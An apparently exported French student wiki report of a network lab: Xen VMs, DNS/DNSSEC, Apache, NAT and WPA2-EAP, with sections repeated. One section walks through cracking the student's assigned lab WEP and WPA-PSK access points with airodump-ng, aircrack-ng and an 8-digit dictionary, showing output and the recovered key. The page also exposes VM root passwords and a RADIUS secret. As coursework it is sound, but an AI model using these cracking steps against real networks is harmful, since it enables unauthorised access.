127.0.1.1 archlinuxbtw.lol SE4.CachyOS<br />
<br />
==== DNSSEC ====<br />
Afin de protéger notre DNS contre des possibles attaques nous utiliserons DNSSEC. Ici nous utiliserons la politique DNSSEC : <code>"dnspol"</code><br />
Ensuite on crée le dossier keys et on donne les droits a bind d'écrire dedans avec :<syntaxhighlight lang="shell"><br />
mkdir /etc/bind/keys <br />
chown bind:bind /etc/bind/keys <br />
chmod 750 /etc/bind/keys<br />
</syntaxhighlight>Pour ce faire, dans <code>named.conf.local</code> il faut rajouter les 3 lignes à partir de "key-directory" :<syntaxhighlight lang="shell"><br />
key-directory "/etc/bind/keys";<br />
dnssec-policy "dnspol"; // DNSSEC automatique<br />
inline-signing yes;<br />
<br />
[...]<br />
<br />
dnssec-policy "dnspol" {<br />
keys {<br />
ksk key-directory lifetime unlimited algorithm 13;<br />
zsk key-directory lifetime unlimited algorithm 13;<br />
};<br />
nsec3param;<br />
};<br />
<br />
</syntaxhighlight>Pour l'activer, il faut restart bind9 avec <code>systemctl restart bind9</code><br />
<br />
Il ne reste qu'à ajouter la clé KSK sur Gandi et ensite on peut voir s'il fonctionne bien grace au site suivant : <nowiki>https://dnsviz.net</nowiki><br />
[[Fichier:DNSSec.png|centré|vignette|DNSSec]]<br />
<br />
<br />
Et on peut voir que nos clefs on bien été générer : <syntaxhighlight lang="shell"><br />
root@CachyOS:/etc/bind# ls keys/<br />
Karchlinuxbtw.lol.+013+24458.key Karchlinuxbtw.lol.+013+56682.key<br />
Karchlinuxbtw.lol.+013+24458.private Karchlinuxbtw.lol.+013+56682.private<br />
Karchlinuxbtw.lol.+013+24458.state Karchlinuxbtw.lol.+013+56682.state<br />
<br />
</syntaxhighlight><br />
<br />
==== Apache ====<br />
Dans ce repertoire <code>/etc/apache2/sites-availab</code>le : touch archlinuxbtw.lol.conf <br />
<br />
<br />
Je genere un crt via la commande : <br />
<br />
openssl x509 -req -days 365 -in archlinuxbtw.csr -signkey archlinuxb<br />
<br />
tw.lol.key -out archlinuxbtw.lol.crt<br />
<br />
<br />
Et je deplace mes fichiers dans : <br />
<br />
root@CachyOS:~# mv archlinuxbtw.lol.crt /etc/ssl/certs/ <br />
<br />
root@CachyOS:~# mv archlinuxbtw.lol.key /etc/ssl/private/ <br />
<br />
root@CachyOS:~# chmod 600 /etc/ssl/private/archlinuxbtw.lol.key<br />
<br />
Pour arreter le service par defaut : a2dissite 000-default.conf <br />
<br />
Et on verifie avec la commande : apache2ctl -S<br />
<br />
Iptable pour atteindres les ports https : <code># HTTP iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 192.168.10.3:80 # HTTPS iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT --to-destination 192.168.10.3:443 iptables-save</code><br />
<br />
<br />
iptables -A FORWARD -p tcp -d 192.168.10.3 --dport 80 -j ACCEPT<br />
<br />
iptables -A FORWARD -p tcp -d 192.168.10.3 --dport 443 -j ACCEPT<br />
==== Effraction WiFi ====<br />
<br />
===== Cassage WEP =====<br />
Il faut tout faire sur la zabeth13 comme on avait tester sur 4 machines dans la semaine avec mon binome les cartes réseaux des autres machines ne marchent pas. <br />
<br />
Avec ip link je vois que l'interface wifi se nomme <code>wlx40a5ef0f679b</code>.<br />
<br />
On peut alors recuperer le bssid de notre réseau wifi a crack. Je suis le numéro 5 donc je dois crack la cracotte05 : <br />
<br />
<code>sudo airodump-ng wlx40a5ef0f679b</code><br />
<br />
<br />
Je recupere :<br />
<br />
<code>BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID</code><br />
<br />
<code>04:DA:D2:9C:50:54 -63 27 5 0 4 54e. WEP WEP cracotte05</code> <br />
<br />
Je peux alors dump correctement en filtrant seulement le bon bssid et le bon channel via cette commande : <br />
<br />
<code>sudo airodump-ng wlx40a5ef0f679b --write airodump --bssid 04:DA:D2:9C:50:54 -c4</code><br />
<br />
Et en parallele on lance ceci jusqu'a ce que la clef soit trouvé :<br />
<br />
<code>aircrack-ng airodump-01.cap</code><syntaxhighlight lang="shell"><br />
Aircrack-ng 1.7 <br />
<br />
<br />
[00:26:11] Tested 835 keys (got 68980 IVs)<br />
Got 70001 out of 70000 IVsStarting PTW attack with 70001 ivs.<br />
KB depth byte(vote)<br />
0 0/ 13 FF(97024) A3(79616) D9(79360) C5(78848) 3A(78592) E3(78592) 29(78336) D1(78336) E9(78080) 7C(77568) DF(77568) 34(76800) 85(76800) D8(76544) 24(76032) <br />
1 0/ 1 CA(108544) CB(80128) B5(79104) EB(78336) 10(77824) A8(77312) E5(76800) F8(76800) E7(76544) EE(76544) 27(76288) 4C(76288) 68(76288) CC(76288) E6(76288) <br />
2 2/ 2 A4(80128) 3A(78336) 14(76800) 5A(76544) D2(76544) 98(76032) 08(75776) 1D(75776) 40(75776) 99(75776) E4(75776) F2(75776) CD(75520) F7(75520) 56(75008) <br />
3 0/ 1 D1(100608) 89(79872) 22(77568) 11(77056) A0(77056) 9E(76800) B0(76800) 98(76544) A9(76544) 5A(76032) AB(76032) CD(76032) 9A(75776) 4D(75520) 51(75264) <br />
4 7/ 4 43(77312) 4E(76800) 0F(76544) 29(76544) BA(76544) 3E(76032) 61(75776) A6(75776) C6(75776) 89(75264) 21(75008) 5A(75008) 65(75008) C8(75008) DD(75008) <br />
<br />
KEY FOUND! [ FF:FF:FF:FF:FA:BC:06:CB:AE:EE:EE:EE:EE ] <br />
Decrypted correctly: 100%<br />
<br />
<br />
</syntaxhighlight><br />
<br />
===== Cassage WPA-PKS =====<br />
Ce script python permet de creer un dictionnaire :<syntaxhighlight lang="python"><br />
with open("dictionnaire_8_chiffres.txt", "w") as f:<br />
for i in range(100000000): # Pour générer des nombres de 00000000 à 99999999<br />
f.write(f"{i:08d}\n") # Écrit le nombre avec 8 chiffres<br />
<br />
</syntaxhighlight>ou alors avec crunch :<br />
<br />
<code>crunch 8 8 0123456789 -o dictionnaire_8_chiffres.txt</code><br />
<br />
<br />
<br />
Ensuite après execution nous pouvons recuperer le fichier .txt créer.<br />
<br />
<br />
<br />
On récuperer le dump comme precedemment pour cette borne pour mon cas :<br />
<br />
<code>BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID</code><br />
<br />
<code>44:AD:D9:5F:87:04 -43 3 5 2 13 54e. WPA2 CCMP PSK kracotte05</code> <br />
<br />
Je peux alors dump correctement en filtrant seulement le bon bssid et le bon channel via cette commande :<code>sudo airodump-ng wlx40a5ef0f679b --write airodumpWPA --bssid 44:AD:D9:5F:87:04 -c13</code><br />
<br />
Et ensuite après avoir récuperer 1 data minimum :<br />
<br />
<code>aircrack-ng airodump-01.cap</code><br />
<br />
==== Sécurisation WiFi par WPA2-EAP ====<br />
Depuis notre machine de service on va se connecter sur notre borne wifi, ici on prend l'IP de la E304 :<br />
<br />
<code>ssh -oKexAlgorithms=+diffie-hellman-group11-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc admin@172.27.0.4</code><br />
<br />
<syntaxhighlight lang="bash"><br />
aaa new-model<br />
aaa authentication login eap_student5 group radius_student5<br />
radius-server host 192.168.10.3 auth-port 1812 acct-port 1813 key secret_student5 <br />
aaa group server radius radius_student5 <br />
server 192.168.10.3 auth-port 1812 acct-port 1813 <br />
exit<br />
<br />
dot11 ssid VM_SERVICES_5 <br />
vlan 15 <br />
authentication open eap eap_student5 <br />
authentication network-eap eap_student5<br />
authentication key-management wpa<br />
mbssid guest-mode<br />
exit<br />
<br />
interface Dot11Radio0<br />
encryption vlan 15 mode ciphers aes-ccm <br />
exit<br />
<br />
interface Dot11Radio0.15<br />
encapsulation dot1Q 15<br />
bridge-group 15<br />
exit<br />
<br />
interface GigabitEthernet0.15<br />
encapsulation dot1Q 15<br />
bridge-group 15<br />
exit<br />
<br />
</syntaxhighlight><br />
<br />
<br />
et l'IP de la E305 :<br />
<br />
<code>ssh -oKexAlgorithms=+diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc admin@172.27.0.3</code> <br />
<br />
=== Utiles ===<br />
<br />
=== XEN ===<br />
''<u>Liste des VMs allumées :</u>'' <syntaxhighlight lang="shell"><br />
xen list<br />
</syntaxhighlight><br />
<br />
''<u>Se connecter à la VM :</u>''<syntaxhighlight lang="shell"><br />
xen console <nomMachine><br />
</syntaxhighlight>nomMachine : dans notre cas soit SE4.Manjaro | SE4.CachyOS | SE4.LinusTorvalds<br />
''<u>Sortir de la console xen :</u>''<syntaxhighlight lang="shell"><br />
Ctrl + Shift + 5<br />
</syntaxhighlight>''<u>Eteindre une VM :</u>'' <syntaxhighlight lang="shell"><br />
xen shutdown <nomMachine><br />
</syntaxhighlight>nomMachine : dans notre cas soit SE4.Manjaro | SE4.CachyOS | SE4.LinusTorvalds<br />
<br />
''<u>Allumer une VM :</u>''<syntaxhighlight lang="shell"><br />
xen create /etc/xen/<nomMachine>.cfg<br />
</syntaxhighlight></div>
Cpayet
https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E5&diff=12163
Atelier SysRes SE4 2025/2026 E5
2026-02-10T15:25:53Z
<p>Cpayet : /* Sécurisation WiFi par WPA2-EAP */</p>
<hr />
<div>=== Compte rendu des commandes effectués ===<br />
<br />
==== Etape 1 : Connexion SSH ====<br />
ssh root@capbreton<br />
<br />
Mot de passe : <br />
<br />
==== Etape 2 : Créer un fichier dans le répertoire /etc/network/interfaces.d du Dom0 aux noms du binôme concerné ====<br />
On se déplace à ce répertoire :<syntaxhighlight lang="shell"><br />
cd /etc/network/interfaces.d/<br />
</syntaxhighlight>On créer ensuite ensuite un fichier aux noms de notre binôme et on l'édite :<syntaxhighlight lang="shell"><br />
touch SE42026_cpayet_tdelobel<br />
vim SE42026_cpayet_tdelobel<br />
<br />
</syntaxhighlight>Puis on donne un nom au bridge, ici c'est `pont_pacman`et on met dans le fichier ceci :<syntaxhighlight lang="shell"><br />
auto pont_pacman<br />
iface pont_pacman inet manual<br />
bridge_ports none<br />
up ip link set $IFACE up<br />
down ip link set $IFACE down<br />
</syntaxhighlight>Une fois le pont créer, il faut le démarrer :<syntaxhighlight lang="shell"><br />
ifup pont_pacman<br />
</syntaxhighlight><br />
<br />
==== Etape 3 : Création des VMs ====<br />
<syntaxhighlight lang="shell"><br />
xen-create-image --hostname=SE4.CachyOS --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
xen-create-image --hostname=SE4.Manjaro --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
xen-create-image --hostname=SE4.LinusTorvalds --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
</syntaxhighlight>On adapte les hostnames en fonction des nom de nos machines. <br />
<br />
'''''IMPORTANT :''''' Les résultats des commandes sont à noter car ellles contiennent les mots de passe et autres informations importantes.<br />
<br />
===== Nos résultats : =====<br />
CachyOS : <syntaxhighlight lang="shell"><br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.CachyOS<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:8B:45:EC<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:p+nECGSXOPvFjDjk+/x8adAn8JxTTPjuknCTcFZxJNk (DSA)<br />
SSH Fingerprint : SHA256:YaNMhK5ZFF/TshemMHSmt08R9uBPAnhNK134XEZ0CuY (ECDSA)<br />
SSH Fingerprint : SHA256:qQNuBNfAoySUPOFPplDh8p0ZPtxRulz/vbOq+Pm4gwM (ED25519)<br />
SSH Fingerprint : SHA256:psWV2TNuHsZcRelqipM7TJ/mE4cvFI+oxndg6nvCpCk (RSA)<br />
Root Password : 6nyCiterydiMtnxsPDRsUys<br />
<br />
</syntaxhighlight>Manjaro : <syntaxhighlight lang="shell"><br />
<br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.Manjaro<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:36:79:D8<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:n+ojtWyKBODRtEppjCvAp6nd2cjL/Ily54j0cM03lMc (DSA)<br />
SSH Fingerprint : SHA256:K+Qa9NAU3JIGsMy3LEYCgFbfL3ozuiRKG+U3XsbV5ow (ECDSA)<br />
SSH Fingerprint : SHA256:AJLfxk4Zz8BZflWYOS8mifapH+uAFgGKA3WSj6rN0NA (ED25519)<br />
SSH Fingerprint : SHA256:/6iWOWoii0nJsbScwVYIGQAbuTI1/YIpaRyRdBl8mwE (RSA)<br />
Root Password : PgvMbhYvgtksg8tmiJnVZnQ<br />
</syntaxhighlight>LinusTorvalds :<syntaxhighlight lang="shell"><br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.LinusTorvalds<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:AA:BF:EF<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:ouY/2dce0YI/mJD9Qw68oKU0xdw6Cs9ybgJxRm/FKiI (DSA)<br />
SSH Fingerprint : SHA256:p5lZznE0q8j6c68YTF5toYgBugOkc0IopTO+Ce9SiZ8 (ECDSA)<br />
SSH Fingerprint : SHA256:FbqBOG+0bBjuQBOlAytAlbMV/9VoJ8BAlFadG/VaGD4 (ED25519)<br />
SSH Fingerprint : SHA256:FCEtQGUhMhN9DDtTmt5zts/9PeC7ahnmJA7UOhMnGeg (RSA)<br />
Root Password : ekrmCSKb3ZAxXSYvNpjbiSK<br />
</syntaxhighlight><br />
<br />
==== Etape 4 : ====<br />
PHRASE MANQUANTE<syntaxhighlight lang="shell"><br />
xen create /etc/xen/SE4.Manjaro.cfg<br />
xen create /etc/xen/SE4.CachyOS.cfg<br />
xen create /etc/xen/SE4.LinusTorvalds.cfg<br />
</syntaxhighlight>On vérifie la liste des machines lancées via : <syntaxhighlight lang="shell"><br />
xen list<br />
</syntaxhighlight><br />
<br />
===== Nos résultats : =====<br />
<syntaxhighlight lang="shell"><br />
Name ID Mem VCPUs State Time(s)<br />
SE4.CachyOS 83 2048 1 -b---- 5.6<br />
SE4.Manjaro 85 2048 1 -b---- 5.8<br />
SE4.LinusTorvalds 87 2048 1 -b---- 5.3<br />
</syntaxhighlight><br />
<br />
==== Etape 5 : Partition ====<br />
<br />
===== Sur capbreton =====<br />
<br />
On partionne avec cette commande :<syntaxhighlight lang="shell"><br />
lvcreate -n SE4.CachyOS.var -L 10G virtual<br />
</syntaxhighlight><br />
On éteint notre machine : <syntaxhighlight lang="shell"><br />
xen shutdown SE4.CachyOS<br />
</syntaxhighlight><br />
Et on modifie :<syntaxhighlight lang="shell"><br />
vim /etc/xen/SE4.CachyOS.cfg<br />
</syntaxhighlight><br />
<br />
Et on ajoute ceci :<syntaxhighlight lang="shell"><br />
disk = [<br />
[...],<br />
'phy:/dev/virtual/SE4.CachyOS.home,xvda3,w',<br />
'phy:/dev/virtual/SE4.CachyOS.var,xvdb1,w'<br />
]<br />
</syntaxhighlight><br />
<br />
===== Sur la machine mandataire =====<br />
<br />
Nous ajoutons les partitions dans '''''/etc/fstab''''' : <syntaxhighlight lang="shell"><br />
/dev/xvda3 /var ext4 defaults 0 2<br />
/dev/xvdb1 /home ext4 defaults 0 2<br />
</syntaxhighlight><br />
<br />
Nous formatons les partitions avant de les utiliser : <syntaxhighlight lang="shell"><br />
mkfs -t ext4 /dev/xvda3<br />
mkfs -t ext4 /dev/xvdb1<br />
</syntaxhighlight><br />
<br />
Nous copions le contenu de '''/var''' : <syntaxhighlight lang="shell"><br />
mount /dev/xvda3 /mnt<br />
mv /var/* /mnt<br />
umount /mnt<br />
</syntaxhighlight><br />
<br />
Nous montons ensuite automatiquement les partitions définies dans '''/etc/fstab''' : <syntaxhighlight lang="shell"><br />
mount -a<br />
</syntaxhighlight><br />
<br />
===== De nouveaux sur capbreton =====<br />
On redémarre notre machine : <syntaxhighlight lang="shell"><br />
xen create /etc/xen/SE4.CachyOS.cfg<br />
</syntaxhighlight><br />
<br />
Ensuite on se connecte à notre VM via :<syntaxhighlight lang="shell"><br />
xen console SE4.CachyOS<br />
</syntaxhighlight><br />
<br />
===== Machines de Service - CachyOS & Manjaro =====<br />
Dans notre VM :<br />
<br />
On modifie :<syntaxhighlight lang="shell"><br />
vim /etc/network/interfaces<br />
</syntaxhighlight><br />
Et on ajoute ceci :<syntaxhighlight lang="shell"><br />
auto lo<br />
iface lo inet loopback<br />
<br />
auto eth0<br />
iface eth0 inet static<br />
address 192.168.10.3/24<br />
gateway 192.168.10.1<br />
<br />
# Pour l'ipv6<br />
auto eth1<br />
iface eth1 inet6 auto<br />
<br />
</syntaxhighlight><br />
<br />
* 172.60.0.3 est l'adresse IPV4 de la VM CachyOS<br />
<br />
===== Machine Mandataire - LinusTorvalds =====<br />
La machine mandataire agit comme passerelle IPv4 pour les machines de services. Voici sa configuration réseau :<br />
<br />
La machine mandataire va posséder trois adresses. Une adresse IPv6 routée, une adresse IPv4 routée et une adresse IPv4 pour le réseau privé avec ces deux machines de services. Pour ce faire, nous devons au préalable configurer une nouvelle interface eth1 pour y intégrer la seconde adresse IPv4.<br />
<br />
Sur capbreton, depuis <code>/etc/xen/SE4.CachyOS.cfg :</code><syntaxhighlight lang="shell"><br />
vif = [[...], 'mac=00:16:3E:8B:45:ED,bridge=SE4']<br />
</syntaxhighlight>Pour l'adresse mac on prend celui existant et on fait +1.<br />
<br />
Depuis <code>/etc/resolv.conf </code>:<syntaxhighlight lang="shell"><br />
nameserver 8.8.8.8<br />
<br />
</syntaxhighlight><br />
<br />
==== SSH 476 ssh -oKexAlgorithms=+diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc admin@172.27.0.3 ====<br />
<syntaxhighlight lang="shell"><br />
apt update<br />
apt upgrade<br />
<br />
apt install ssh<br />
apt install bind9<br />
apt install apache2<br />
</syntaxhighlight>(Dans TOUTES les VMs)<br />
<br />
On active le SSH en ajoutant dans <code>/etc/ssh/sshd_config</code> :<syntaxhighlight lang="shell"><br />
PermitRootLogin yes<br />
</syntaxhighlight>Pour redemarrer le service ssh :<syntaxhighlight lang="shell"><br />
/etc/init.d/ssh restart<br />
</syntaxhighlight>Pour la machine mandataire, ensuite après avoir reboot on peut faire dans nos machines de services :<syntaxhighlight lang="shell"><br />
iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.10.0/24<br />
</syntaxhighlight> <br />
<br />
==== Mascarade ====<br />
Sur la mandataire : <syntaxhighlight lang="shell"><br />
iptables -t nat -A PREROUTING -p tcp --dport 2202 -j DNAT --to-destination 192.168.10.3:22<br />
iptables-save<br />
<br />
</syntaxhighlight>Et on décommente cette ligne dans <code>/etc/sysctl.conf</code> : <syntaxhighlight lang="shell"><br />
net.ipv4.ip_forward=1<br />
</syntaxhighlight>Et maintenant nous pouvons nous connecter à notre machine de service en ssh : <syntaxhighlight lang="shell"><br />
#IPV4<br />
ssh root@193.48.57.166 -p 2202<br />
# IPV6<br />
ssh root@2001:660:4401:60a0:216:3eff:fe8b:45ed<br />
</syntaxhighlight><br />
<br />
==== DNS ====<br />
Tout d'abord, il faut modifier <code>/etc/bind/named.conf.local</code> : <syntaxhighlight lang="shell"><br />
zone "archlinuxbtw.lol" {<br />
type master;<br />
file "/etc/bind/myZones/db.archlinuxbtw.lol";<br />
allow-transfer{secondaries;};<br />
notify yes;<br />
};<br />
<br />
acl "secondaries"{<br />
192.168.10.2;<br />
2001:660:4401:60a0:216:3eff:fe36:79d9;<br />
};<br />
<br />
zone "archlinux.lol" {<br />
type secondary;<br />
file "/etc/bind/backup/db.archlinux.lol";<br />
primaries{2001:660:4401:60a0:216:3eff:fe36:79d9;};<br />
};<br />
<br />
</syntaxhighlight>J'ai ensuite créée un dossier myZones puis j'ai créer db.archlinuxbtw.lol et j'y ai ajouter :<syntaxhighlight lang="shell"><br />
$TTL 400<br />
<br />
@ IN SOA ns.archlinuxbtw.lol admin.archlinuxbtw.lol (<br />
3609 ; Numero de version<br />
21600 ; Rafraichissement (6h)<br />
3600 ; Re-tentative (1h)<br />
2592000 ; Expiration (30j)<br />
86400 ; Cache negatif (24h)<br />
);<br />
<br />
IN NS ns.archlinuxbtw.lol.<br />
IN NS ns.archlinux.lol.<br />
@ IN A 193.48.57.166<br />
@ IN AAAA 2001:660:4401:60a0:216:3eff:fe8b:45ed<br />
ns IN A 193.48.57.166<br />
ns IN AAAA 2001:660:4401:60a0:216:3eff:fe8b:45ed<br />
<br />
www IN CNAME archlinuxbtw.lol<br />
<br />
</syntaxhighlight>Ensuite on restart le service via : <code>service named restart</code><br />
<br />
<br />
Création d'une clé<syntaxhighlight lang="shell"><br />
openssl req -nodes -newkey rsa:2048 -sha256 -keyout archlinuxbtw.lol.key -out archlinuxbtw.csr<br />
</syntaxhighlight><br />
[[Fichier:DNS Check.png|centré|vignette|452x452px|DNS Checker ]]<br />
Notre DNS est bien reconnu et la commande <code>dig @8.8.8.8 archlinuxbtw.lol</code> c'est grâce au Glue records.<br />
<br />
<br />
Génération des clés<br />
<br />
<br />
Changement nom machine <code>nano /etc/hostname : CachyOS</code><br />
<br />
Et dans /etc/hosts:<br />
<br />
127.0.1.1 archlinuxbtw.lol SE4.CachyOS<br />
<br />
==== DNSSEC ====<br />
Afin de protéger notre DNS contre des possibles attaques nous utiliserons DNSSEC. Ici nous utiliserons la politique DNSSEC : <code>"dnspol"</code><br />
Ensuite on crée le dossier keys et on donne les droits a bind d'écrire dedans avec :<syntaxhighlight lang="shell"><br />
mkdir /etc/bind/keys <br />
chown bind:bind /etc/bind/keys <br />
chmod 750 /etc/bind/keys<br />
</syntaxhighlight>Pour ce faire, dans <code>named.conf.local</code> il faut rajouter les 3 lignes à partir de "key-directory" :<syntaxhighlight lang="shell"><br />
key-directory "/etc/bind/keys";<br />
dnssec-policy "dnspol"; // DNSSEC automatique<br />
inline-signing yes;<br />
<br />
[...]<br />
<br />
dnssec-policy "dnspol" {<br />
keys {<br />
ksk key-directory lifetime unlimited algorithm 13;<br />
zsk key-directory lifetime unlimited algorithm 13;<br />
};<br />
nsec3param;<br />
};<br />
<br />
</syntaxhighlight>Pour l'activer, il faut restart bind9 avec <code>systemctl restart bind9</code><br />
<br />
Il ne reste qu'à ajouter la clé KSK sur Gandi et ensite on peut voir s'il fonctionne bien grace au site suivant : <nowiki>https://dnsviz.net</nowiki><br />
[[Fichier:DNSSec.png|centré|vignette|DNSSec]]<br />
<br />
<br />
Et on peut voir que nos clefs on bien été générer : <syntaxhighlight lang="shell"><br />
root@CachyOS:/etc/bind# ls keys/<br />
Karchlinuxbtw.lol.+013+24458.key Karchlinuxbtw.lol.+013+56682.key<br />
Karchlinuxbtw.lol.+013+24458.private Karchlinuxbtw.lol.+013+56682.private<br />
Karchlinuxbtw.lol.+013+24458.state Karchlinuxbtw.lol.+013+56682.state<br />
<br />
</syntaxhighlight><br />
<br />
==== Apache ====<br />
Dans ce repertoire <code>/etc/apache2/sites-availab</code>le : touch archlinuxbtw.lol.conf <br />
<br />
<br />
Je genere un crt via la commande : <br />
<br />
openssl x509 -req -days 365 -in archlinuxbtw.csr -signkey archlinuxb<br />
<br />
tw.lol.key -out archlinuxbtw.lol.crt<br />
<br />
<br />
Et je deplace mes fichiers dans : <br />
<br />
root@CachyOS:~# mv archlinuxbtw.lol.crt /etc/ssl/certs/ <br />
<br />
root@CachyOS:~# mv archlinuxbtw.lol.key /etc/ssl/private/ <br />
<br />
root@CachyOS:~# chmod 600 /etc/ssl/private/archlinuxbtw.lol.key<br />
<br />
Pour arreter le service par defaut : a2dissite 000-default.conf <br />
<br />
Et on verifie avec la commande : apache2ctl -S<br />
<br />
Iptable pour atteindres les ports https : <code># HTTP iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 192.168.10.3:80 # HTTPS iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT --to-destination 192.168.10.3:443 iptables-save</code><br />
<br />
<br />
iptables -A FORWARD -p tcp -d 192.168.10.3 --dport 80 -j ACCEPT<br />
<br />
iptables -A FORWARD -p tcp -d 192.168.10.3 --dport 443 -j ACCEPT<br />
==== Effraction WiFi ====<br />
<br />
===== Cassage WEP =====<br />
Il faut tout faire sur la zabeth13 comme on avait tester sur 4 machines dans la semaine avec mon binome les cartes réseaux des autres machines ne marchent pas. <br />
<br />
Avec ip link je vois que l'interface wifi se nomme <code>wlx40a5ef0f679b</code>.<br />
<br />
On peut alors recuperer le bssid de notre réseau wifi a crack. Je suis le numéro 5 donc je dois crack la cracotte05 : <br />
<br />
<code>sudo airodump-ng wlx40a5ef0f679b</code><br />
<br />
<br />
Je recupere :<br />
<br />
<code>BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID</code><br />
<br />
<code>04:DA:D2:9C:50:54 -63 27 5 0 4 54e. WEP WEP cracotte05</code> <br />
<br />
Je peux alors dump correctement en filtrant seulement le bon bssid et le bon channel via cette commande : <br />
<br />
<code>sudo airodump-ng wlx40a5ef0f679b --write airodump --bssid 04:DA:D2:9C:50:54 -c4</code><br />
<br />
Et en parallele on lance ceci jusqu'a ce que la clef soit trouvé :<br />
<br />
<code>aircrack-ng airodump-01.cap</code><syntaxhighlight lang="shell"><br />
Aircrack-ng 1.7 <br />
<br />
<br />
[00:26:11] Tested 835 keys (got 68980 IVs)<br />
Got 70001 out of 70000 IVsStarting PTW attack with 70001 ivs.<br />
KB depth byte(vote)<br />
0 0/ 13 FF(97024) A3(79616) D9(79360) C5(78848) 3A(78592) E3(78592) 29(78336) D1(78336) E9(78080) 7C(77568) DF(77568) 34(76800) 85(76800) D8(76544) 24(76032) <br />
1 0/ 1 CA(108544) CB(80128) B5(79104) EB(78336) 10(77824) A8(77312) E5(76800) F8(76800) E7(76544) EE(76544) 27(76288) 4C(76288) 68(76288) CC(76288) E6(76288) <br />
2 2/ 2 A4(80128) 3A(78336) 14(76800) 5A(76544) D2(76544) 98(76032) 08(75776) 1D(75776) 40(75776) 99(75776) E4(75776) F2(75776) CD(75520) F7(75520) 56(75008) <br />
3 0/ 1 D1(100608) 89(79872) 22(77568) 11(77056) A0(77056) 9E(76800) B0(76800) 98(76544) A9(76544) 5A(76032) AB(76032) CD(76032) 9A(75776) 4D(75520) 51(75264) <br />
4 7/ 4 43(77312) 4E(76800) 0F(76544) 29(76544) BA(76544) 3E(76032) 61(75776) A6(75776) C6(75776) 89(75264) 21(75008) 5A(75008) 65(75008) C8(75008) DD(75008) <br />
<br />
KEY FOUND! [ FF:FF:FF:FF:FA:BC:06:CB:AE:EE:EE:EE:EE ] <br />
Decrypted correctly: 100%<br />
<br />
<br />
</syntaxhighlight><br />
<br />
===== Cassage WPA-PKS =====<br />
Ce script python permet de creer un dictionnaire :<syntaxhighlight lang="python"><br />
with open("dictionnaire_8_chiffres.txt", "w") as f:<br />
for i in range(100000000): # Pour générer des nombres de 00000000 à 99999999<br />
f.write(f"{i:08d}\n") # Écrit le nombre avec 8 chiffres<br />
<br />
</syntaxhighlight>ou alors avec crunch :<br />
<br />
<code>crunch 8 8 0123456789 -o dictionnaire_8_chiffres.txt</code><br />
<br />
<br />
<br />
Ensuite après execution nous pouvons recuperer le fichier .txt créer.<br />
<br />
<br />
<br />
On récuperer le dump comme precedemment pour cette borne pour mon cas :<br />
<br />
<code>BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID</code><br />
<br />
<code>44:AD:D9:5F:87:04 -43 3 5 2 13 54e. WPA2 CCMP PSK kracotte05</code> <br />
<br />
Je peux alors dump correctement en filtrant seulement le bon bssid et le bon channel via cette commande :<code>sudo airodump-ng wlx40a5ef0f679b --write airodumpWPA --bssid 44:AD:D9:5F:87:04 -c13</code><br />
<br />
Et ensuite après avoir récuperer 1 data minimum :<br />
<br />
<code>aircrack-ng airodump-01.cap</code><br />
<br />
==== Sécurisation WiFi par WPA2-EAP ====<br />
Depuis notre machine de service on va se connecter sur notre borne wifi, ici on prend l'IP de la E304 :<br />
<br />
<code>ssh -oKexAlgorithms=+diffie-hellman-group11-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc admin@172.27.0.4</code><br />
<br />
<syntaxhighlight lang="bash"><br />
aaa new-model<br />
aaa authentication login eap_student5 group radius_student5<br />
radius-server host 192.168.10.3 auth-port 1812 acct-port 1813 key secret_student5 <br />
aaa group server radius radius_student5 <br />
server 192.168.10.3 auth-port 1812 acct-port 1813 <br />
exit<br />
<br />
dot11 ssid VM_SERVICES_5 <br />
vlan 15 <br />
authentication open eap eap_student5 <br />
authentication network-eap eap_student5<br />
authentication key-management wpa<br />
mbssid guest-mode<br />
exit<br />
<br />
interface Dot11Radio0<br />
encryption vlan 15 mode ciphers aes-ccm <br />
exit<br />
<br />
interface Dot11Radio0.15<br />
encapsulation dot1Q 15<br />
bridge-group 15<br />
exit<br />
<br />
interface GigabitEthernet0.15<br />
encapsulation dot1Q 15<br />
bridge-group 15<br />
exit<br />
<br />
</syntaxhighlight><br />
<br />
=== Utiles ===<br />
<br />
=== XEN ===<br />
''<u>Liste des VMs allumées :</u>'' <syntaxhighlight lang="shell"><br />
xen list<br />
</syntaxhighlight><br />
<br />
''<u>Se connecter à la VM :</u>''<syntaxhighlight lang="shell"><br />
xen console <nomMachine><br />
</syntaxhighlight>nomMachine : dans notre cas soit SE4.Manjaro | SE4.CachyOS | SE4.LinusTorvalds<br />
''<u>Sortir de la console xen :</u>''<syntaxhighlight lang="shell"><br />
Ctrl + Shift + 5<br />
</syntaxhighlight>''<u>Eteindre une VM :</u>'' <syntaxhighlight lang="shell"><br />
xen shutdown <nomMachine><br />
